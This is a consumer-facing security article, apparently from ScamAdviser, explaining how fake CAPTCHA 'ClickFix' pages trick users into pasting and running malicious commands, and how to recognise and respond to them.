EN
Security checks exist to keep bots out, but scammers have flipped the script. Fake CAPTCHA scams use the exact tools designed to protect you as a disguise to hack your computer.
Fake verification pages do not test if you are human. They trick you into installing malware on your own device. You try to prove you are not a robot, and in the process, you hand over the keys to your system.
This article breaks down exactly how the ClickFix technique works, what happens when you press enter, and how to stop the attack in its tracks.
In a Nutshell
A fake CAPTCHA scam is a malicious webpage that mimics a human verification test to trick you into manually running computer commands. Real CAPTCHAs ask you to click traffic lights or tick a box. Fake CAPTCHA malware uses a technique called ClickFix, where the page silently copies a hidden, malicious script to your computer's clipboard the moment you click "Verify".
The page then gives you step-by-step instructions designed to look like a standard security check. It tells you to press "Windows Key + R" to open the Run menu, press "Ctrl + V" to paste a verification code, and hit Enter. Because you believe you are just pasting a harmless code, your guard is down.
The moment you press Enter, you execute that hidden script. Behind the scenes, the command launches legitimate Windows tools like PowerShell or mshta.exe—programs that execute scripts—to download and install malware directly onto your machine.
In Q3 2024, researchers observed a significant rise in fake CAPTCHA campaigns. By April 2025, nearly 11% of all phishing emails globally were sent using trusted platforms. These campaigns have delivered destructive malware including Lumma Stealer, Rhadamanthys, AsyncRAT, and XWorm.
Fake CAPTCHA scams spread primarily through hijacked search results, malicious ads, and deceptive emails. You might search for a common software download and click an ad—known as malvertising—that redirects you to a fake verification page. Attackers also use SEO poisoning, a tactic where they manipulate search engines to make their fraudulent sites rank at the top of your results.
Other times, you might click a link in a phishing email or land on a legitimate website that a hacker has compromised with injected scripts. Once you arrive, the site blocks the content you want and displays the fake "I am not a robot" prompt.
You cannot rely on blocking a single bad web address to stay safe. Attackers regularly swap URLs to evade detection after cybersecurity firms take their pages down.
Fake CAPTCHAs install aggressive software designed to steal your data or take complete control of your device. The most common payloads are info stealers like Lumma Stealer, StealC, and Rhadamanthys, which silently harvest your saved passwords, browser cookies, and cryptocurrency wallets. By stealing your active session cookies, hackers bypass two-factor authentication and walk right into your accounts.
Other campaigns drop Remote Access Trojans (RATs) such as AsyncRAT or XWorm, which give attackers a hidden backdoor to watch your screen and control your device. You might also encounter multi-stage loaders like Emmenhtal—malware that acts as a delivery truck, dropping a series of additional viruses onto your system over time.
This threat also targets smartphones through a specific mobile variant. Some fake CAPTCHAs on phones trick you into sending an automated text message to "prove you are human," which actually triggers international SMS fraud and runs up phone bills of around $30 per victim.
You can identify a fake CAPTCHA because it always asks you to perform actions outside of your web browser, like opening system menus or copying text. A legitimate security check will only ever ask you to interact directly with the webpage itself.
| Legitimate CAPTCHA | Fake CAPTCHA |
| Tick a box or solve a visual puzzle | Asks you to open the Windows Run dialog (Win+R) or a terminal |
| Never involves keyboard shortcuts | Gives step-by-step keyboard instructions |
| Never asks you to copy-paste anything | Copies a command silently to your clipboard |
| Always on the website you intended to visit | Often appears on unfamiliar domains or pop-up pages |
| Does not ask you to download files | May include tutorial videos guiding you through system steps |
If you pasted and ran the command, you must immediately disconnect your device from the internet to sever the attacker's connection. Pull the ethernet cable or turn off your Wi-Fi router to stop the malware from sending your stolen passwords back to the hacker.
You protect yourself by treating any request to use keyboard shortcuts like Windows Key + R as an immediate, severe security threat. Websites cannot force you to open system menus, so they have to use psychological tricks to convince you to do it yourself.
Be highly skeptical of any CAPTCHA that appears on a pop-up, a suspicious domain, or a free content-streaming site. You can reduce your exposure by using a browser extension that blocks malicious domains and keeping your operating system and antivirus software fully updated.
For high-risk browsing, consider disabling JavaScript on unknown sites or using a dedicated, isolated browser. If you are on a smartphone, never send an SMS to verify your identity—legitimate CAPTCHAs will never open your messaging app to send premium texts.
The fake CAPTCHA scam is brilliantly deceptive because it turns your own security habits against you. You are conditioned to click buttons to prove you are human, making the request feel routine and harmless.
This attack exploits routine human behavior. The hackers need you to manually run their code, so they disguise the payload as a standard verification step.
If a website ever asks you to press the Windows key or paste a command to prove you are human, close the tab immediately.
Frequently Asked Questions
Can my antivirus block a fake CAPTCHA?
Your antivirus might catch the malware after it downloads, but it cannot prevent you from manually pasting and running the malicious command.
Does clicking the verify button install the malware?
Clicking the button only copies the malicious code to your clipboard; the actual infection happens when you paste and press Enter.
Are fake CAPTCHAs only dangerous on Windows computers?
While the fake CAPTCHA Windows Run dialog trick targets PCs, mobile variants of this scam trick users into sending premium rate text messages.
How do hackers hide the malicious command from me?
The fake CAPTCHA page copies the code silently to your clipboard so that when you paste it into the Run prompt, you execute it without reading it.
Adam Collins is a cybersecurity researcher at ScamAdviser who operates under a pseudonym for privacy and security. With over four years on the digital frontlines, he specialises in translating complex threats into actionable advice. His mission: exposing red flags so you can navigate the web with confidence.
